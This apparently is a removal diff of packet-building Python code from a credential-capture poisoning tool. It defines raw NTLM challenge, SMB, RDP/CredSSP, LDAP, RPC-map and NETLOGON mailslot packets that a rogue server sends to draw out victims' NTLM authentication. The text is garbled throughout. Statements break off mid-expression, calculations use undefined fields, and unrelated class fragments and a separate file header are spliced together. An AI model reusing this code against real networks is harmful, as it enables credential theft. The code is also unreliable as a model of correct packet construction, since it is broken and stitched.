("TargetNameMaxLen", "\x06\x00"), - ("TargetNameOffset", "\x38\x00\x00\x00"), - ("NegoFlags", "\x05\x02\x89\xa2"), - ("ServerChallenge", ""), - ("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), - ("TargetInfoLen", "\x7e\x00"), - ("TargetInfoMaxLen", "\x7e\x00"), - ("TargetInfoOffset", "\x3e\x00\x00\x00"), - ("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"), - ("TargetNameStr", settings.Config.Domain), - ("Av1", "\x02\x00"),#nbt name - ("Av1Len", "\x06\x00"), - ("Av1Str", settings.Config.Domain), - ("Av2", "\x01\x00"),#Server name - ("Av2Len", "\x14\x00"), - ("Av2Str", settings.Config.MachineName), - ("Av3", "\x04\x00"),#Full Domain name - ("Av3Len", "\x12\x00"), - ("Av3Str", settings.Config.DomainName), - ("Av4", "\x03\x00"),#Full machine domain name - ("Av4Len", "\x28\x00"), - ("Av4Str", settings.Config.MachineName+'.'+settings.Config.DomainName), - ("Av5", "\x05\x00"),#Domain Forest Name - ("Av5Len", "\x12\x00"), - ("Av5Str", settings.Config.DomainName), - ("Av6", "\x00\x00"),#AvPairs Terminator - ("Av6Len", "\x00\x00"), - ]) - - def calculate(self): - # First convert to unicode - self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le').decode('latin-1') - self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le').decode('latin-1') - self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le').decode('latin-1') - self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le').decode('latin-1') - self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le').decode('latin-1') - self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le').decode('latin-1') - - # Then calculate - CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) - CalculateSSPI = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) - CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"]) - CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"]) - CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) - - self.fields["Len"] = StructWithLenPython2or3(">h",len(CalculateCompletePacket)) - self.fields["SSPIBuffLen"] = StructWithLenPython2or3("i", len(CalculatePacketLen)) - self.fields["OpHeadASNIDLen"] = StructWithLenPython2or3(">i", len(OperationPacketLen)) - self.fields["SequenceHeaderLen"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)) - ##### Workstation Offset Calculation: - self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("B", len(CalculateNetlogonLen)) - self.fields["NetAttribLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+2) - self.fields["PartAttribHeadLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+18) - self.fields["SequenceHeaderLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+24) - self.fields["OpHeadASNIDLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+32) - self.fields["ParserHeadASNLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+42) - ###### - self.fields["ClientSiteNamePtrOffset"] = StructWithLenPython2or3(">B", len(CalculateNetlogonOffset)-1) - -##### SMB Packets ##### -class SMBHeader(Packet): - fields = OrderedDict([ - ("proto", "\xff\x53\x4d\x42"), - ("cmd", "\x72"), - ("errorcode", "\x00\x00\x00\x00"), - ("flag1", "\x00"), - ("flag2", "\x00\x00"), - ("pidhigh", "\x00\x00"), - ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"), - ("reserved", "\x00\x00"), - ("tid", "\x00\x00"), - ("pid", "\x00\x00"), - ("uid", "\x00\x00"), - ("mid", "\x00\x00"), - ]) - -class SMBNego(Packet): - fields = OrderedDict([ - ("wordcount", "\x00"), - ("bcc", "\x62\x00"), - ("data", "") - ]) - - def calculate(self): - self.fields["bcc"] = StructPython2or3("B", len(AsnLen+CalculateSecBlob)-3) - self.fields["NegTokenTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-6) - self.fields["Tag1ASNIdLen"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"]))) - self.fields["Tag1ASNId2Len"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2Str"]))) - self.fields["Tag2ASNIdLen"] = StructWithLenPython2or3(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]))) - self.fields["Tag3ASNIdLen"] = StructWithLenPython2or3(">B", len(CalculateSecBlob)) - - ###### Andxoffset calculation. - CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen - self.fields["Andxoffset"] = StructWithLenPython2or3(" 255: - self.fields["Tag3ASNIdLen"] = StructWithLenPython2or3(">H", len(CalculateSecBlob)) - else: - self.fields["Tag3ASNIdLenOfLen"] = "\x81" - self.fields["Tag3ASNIdLen"] = StructWithLenPython2or3(">B", len(CalculateSecBlob)) - - if len(AsnLen+CalculateSecBlob)-3 > 255: - self.fields["ChoiceTagASNIdLen"] = StructWithLenPython2or3(">H", len(AsnLen+CalculateSecBlob)-4) - else: - self.fields["ChoiceTagASNLenOfLen"] = "\x81" - self.fields["ChoiceTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-3) - - if len(AsnLen+CalculateSecBlob)-7 > 255: - self.fields["NegTokenTagASNIdLen"] = StructWithLenPython2or3(">H", len(AsnLen+CalculateSecBlob)-8) - else: - self.fields["NegTokenTagASNLenOfLen"] = "\x81" - self.fields["NegTokenTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-7) - - tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]) - - if len(tag2length) > 255: - self.fields["Tag2ASNIdLen"] = StructWithLenPython2or3(">H", len(tag2length)) - else: - self.fields["Tag2ASNIdLenOfLen"] = "\x81" - self.fields["Tag2ASNIdLen"] = StructWithLenPython2or3(">B", len(tag2length)) - - self.fields["Tag1ASNIdLen"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"]))) - self.fields["Tag1ASNId2Len"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2Str"]))) - - ###### Workstation Offset - CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) - - ###### AvPairs Offset - CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) - - ##### Workstation Offset Calculation: - self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("h",len(str(self.fields["Data"]))+4)#Data+own header. - -class X224(Packet): - fields = OrderedDict([ - ("Length", "\x0e"), - ("Cmd", "\xd0"), - ("Dstref", "\x00\x00"), - ("Srcref", "\x12\x34"), - ("Class", "\x00"), - ("Data", "") - ]) - - def calculate(self): - self.fields["Length"] = StructWithLenPython2or3(">B",len(str(self.fields["Data"]))+6) - - -class RDPNEGOAnswer(Packet): - fields = OrderedDict([ - ("Cmd", "\x02"), - ("Flags", "\x00"), - ("Length", "\x08\x00"), - ("SelectedProto", "\x02\x00\x00\x00"),#CredSSP - ]) - - def calculate(self): - self.fields["Length"] = StructWithLenPython2or3("B - ("PacketStartASNTag0", "\xa0"), - ("PacketStartASNTag0Len", "\x03"), #Static for TSVersion - ("PacketStartASNTag0Len2", "\x02"), - ("PacketStartASNTag0Len3", "\x01"), - ("PacketStartASNTag0CredSSPVersion", "\x05"),##TSVersion: Since padding oracle, v2,v3,v4 are rejected by win7.. - ("ParserHeadASNID1", "\xa1"), - ("ParserHeadASNLenOfLen1", "\x81"), - ("ParserHeadASNLen1", "\xfa"), - ("MessageIDASNID", "\x30"), - ("MessageIDASNLen", "\x81"), - ("MessageIDASNLen2", "\xf7"), - ("OpHeadASNID", "\x30"), - ("OpHeadASNIDLenOfLen", "\x81"), - ("OpHeadASNIDLen", "\xf4"), - ("StatusASNID", "\xa0"), - ("MatchedDN", "\x81"), - ("ASNLen01", "\xf1"), - ("SequenceHeader", "\x04"), - ("SequenceHeaderLenOfLen", "\x81"), - ("SequenceHeaderLen", "\xee"), - ####### - ("NTLMSSPSignature", "NTLMSSP"), - ("NTLMSSPSignatureNull", "\x00"), - ("NTLMSSPMessageType", "\x02\x00\x00\x00"), - ("NTLMSSPNtWorkstationLen", "\x1e\x00"), - ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"), - ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"), - ("NTLMSSPNtNegotiateFlags", "\x15\x82\x8a\xe2"), - ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"), - ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), - ("NTLMSSPNtTargetInfoLen", "\x94\x00"), - ("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"), - ("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"), - ("NegTokenInitSeqMechMessageVersionHigh", "\x05"), - ("NegTokenInitSeqMechMessageVersionLow", "\x02"), - ("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"), - ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"), - ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"), - ("NTLMSSPNtWorkstationName", settings.Config.Domain), - ("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"), - ("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"), - ("NTLMSSPNTLMChallengeAVPairsUnicodeStr", settings.Config.Domain), - ("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"), - ("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"), - ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", settings.Config.MachineName), - ("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"), - ("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"), - ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", settings.Config.MachineName+'.'+settings.Config.DomainName), - ("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"), - ("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"), - ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", settings.Config.DomainName), - ("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"), - ("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"), - ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", settings.Config.DomainName), - ("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"), - ("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"), - ]) - - def calculate(self): - - ###### Convert strings to Unicode first - self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le').decode('latin-1') - - ###### Workstation Offset - CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) - ###### AvPairs Offset - CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) - - ###### RDP Packet Len - NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs - - ##### RDP Len Calculation: - - self.fields["SequenceHeaderLen"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)) - self.fields["ASNLen01"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+3) - self.fields["OpHeadASNIDLen"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+6) - self.fields["MessageIDASNLen2"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+9) - self.fields["ParserHeadASNLen1"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+12) - self.fields["PacketStartASNStr"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+20) - - ##### Workstation Offset Calculation: - self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("H", self.fields["TowerPortNumberStr"]) - self.fields["TowerIPAddressStr"] = RespondWithIPAton() - - Data= str(self.fields["TowerTotalLen"])+str(self.fields["Tower1Len"])+str(self.fields["Tower1FloorsCount"])+str(self.fields["Tower1ByteCount"])+str(self.fields["Tower1IntUID"])+str(self.fields["Tower1UID"])+str(self.fields["Tower1Version"])+str(self.fields["Tower1VersionMinBC"])+str(self.fields["Tower1VersionMinimum"])+str(self.fields["Tower2ByteCount"])+str(self.fields["Tower2IntUID"])+str(self.fields["Tower2UID"])+str(self.fields["Tower2Version"])+str(self.fields["Tower2VersionMinBC"])+str(self.fields["Tower2VersionMinimum"])+str(self.fields["TowerRpcByteCount"])+str(self.fields["TowerRpctIdentifier"])+str(self.fields["TowerRpcByteCount2"])+str(self.fields["TowerRpcMinimum"])+str(self.fields["TowerPortNumberBC"])+str(self.fields["TowerPortNumberOpcode"])+str(self.fields["TowerPortNumberBC2"])+str(self.fields["TowerPortNumberStr"])+str(self.fields["TowerIPAddressBC"])+str(self.fields["TowerIPAddressOpcode"])+str(self.fields["TowerIPAddressBC2"])+str(self.fields["TowerIPAddressStr"]) - - self.fields["Data"] = Data - -class NTLMChallenge(Packet): - fields = OrderedDict([ - ("NTLMSSPSignature", "NTLMSSP"), - ("NTLMSSPSignatureNull", "\x00"), - ("NTLMSSPMessageType", "\x02\x00\x00\x00"), - ("NTLMSSPNtWorkstationLen", "\x1e\x00"), - ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"), - ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"), - ("NTLMSSPNtNegotiateFlags", "\x15\x82\x8a\xe2"), - ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"), - ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), - ("NTLMSSPNtTargetInfoLen", "\x94\x00"), - ("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"), - ("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"), - ("NegTokenInitSeqMechMessageVersionHigh", "\x05"), - ("NegTokenInitSeqMechMessageVersionLow", "\x02"), - ("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"), - ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"), - ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"), - ("NTLMSSPNtWorkstationName", settings.Config.Domain), - ("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"), - ("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"), - ("NTLMSSPNTLMChallengeAVPairsUnicodeStr", settings.Config.Domain), - ("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"), - ("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"), - ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", settings.Config.MachineName), - ("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"), - ("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"), - ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", settings.Config.MachineName+'.'+settings.Config.DomainName), - ("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"), - ("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"), - ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", settings.Config.DomainName), - ("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"), - ("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"), - ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", settings.Config.DomainName), - ("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"), - ("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"), - ]) - - def calculate(self): - ###### Convert strings to Unicode first - self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le').decode('latin-1') - self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le').decode('latin-1') - - ###### Workstation Offset - CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) - ###### AvPairs Offset - CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) - - ##### Workstation Offset Calculation: - self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("h",len(DataGramLen)) - -class SMBTransMailslot(Packet): - fields = OrderedDict([ - ("Wordcount", "\x11"), - ("TotalParamCount", "\x00\x00"), - ("TotalDataCount", "\x00\x00"), - ("MaxParamCount", "\x02\x00"), - ("MaxDataCount", "\x00\x00"), - ("MaxSetupCount", "\x00"), - ("Reserved", "\x00"), - ("Flags", "\x00\x00"), - ("Timeout", "\xff\xff\xff\xff"), - ("Reserved2", "\x00\x00"), - ("ParamCount", "\x00\x00"), - ("ParamOffset", "\x00\x00"), - ("DataCount", "\x00\x00"), - ("DataOffset", "\x00\x00"), - ("SetupCount", "\x03"), - ("Reserved3", "\x00"), - ("Opcode", "\x01\x00"), - ("Priority", "\x00\x00"), - ("Class", "\x02\x00"), - ("Bcc", "\x00\x00"), - ("MailSlot", "\\MAILSLOT\\NET\\NETLOGON"), - ("MailSlotNull", "\x00"), - ("Padding", "\x00\x00\x00"), - ("Data", ""), - ]) - - def calculate(self): - #Padding - if len(str(self.fields["Data"]))%2==0: - self.fields["Padding"] = "\x00\x00\x00\x00" - else: - self.fields["Padding"] = "\x00\x00\x00" - BccLen = str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"])+str(self.fields["Data"]) - PacketOffsetLen = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved2"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved3"])+str(self.fields["Opcode"])+str(self.fields["Priority"])+str(self.fields["Class"])+str(self.fields["Bcc"])+str(self.fields["MailSlot"])+str(self.fields["MailSlotNull"])+str(self.fields["Padding"]) - - self.fields["DataCount"] = StructWithLenPython2or3(". -import sys -if (sys.version_info < (3, 0)): - sys.exit('This script is meant to be run with Python3') - -import struct -import random -import optparse -import configparser -import os -import codecs -import netifaces -import binascii - -BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..')) -sys.path.insert(0, BASEDIR) -from Responder.odict import 